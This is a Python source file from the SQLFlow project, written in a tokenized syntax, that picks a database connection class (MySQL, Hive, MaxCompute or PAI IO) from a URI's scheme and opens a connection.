# Copyright 2020 The SQLFlow Authors. All rights reserved. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License # NOTE(sneaxiy): do not import the XxxConnection object outside the # following method. It is because those imports are quite slow (about 1-2s), # making that the normal SQL statement runs very slow. <def_stmt>get_connection_object driver<block_start><if_stmt>driver<eq>"mysql"<block_start><import_from_stmt>runtime.dbapi.mysql MySQLConnection<line_sep><return>MySQLConnection<block_end><elif_stmt>driver<eq>"hive"<block_start><import_from_stmt>runtime.dbapi.hive HiveConnection<line_sep><return>HiveConnection<block_end><elif_stmt>driver<eq>"maxcompute"<block_start><import_from_stmt>runtime.dbapi.maxcompute MaxComputeConnection<line_sep><return>MaxComputeConnection<block_end><elif_stmt>driver<eq>"paiio"<block_start><import_from_stmt>runtime.dbapi.paiio PaiIOConnection<line_sep><return>PaiIOConnection<block_end><else_stmt><block_start><raise>ValueError("unsupported driver type %s"%driver)<block_end><block_end><def_stmt>connect uri<block_start>"""Connect to given uri Params: uri: a valid URI string Returns: A Connection object Raises: ValueError if the uri is not valid or can't find given driver """<line_sep>parts=uri.split("://")<if_stmt>len(parts)<l>2<block_start><raise>ValueError("Input should be a valid uri." uri)<block_end><return>get_connection_object(parts[0])(uri)<block_end>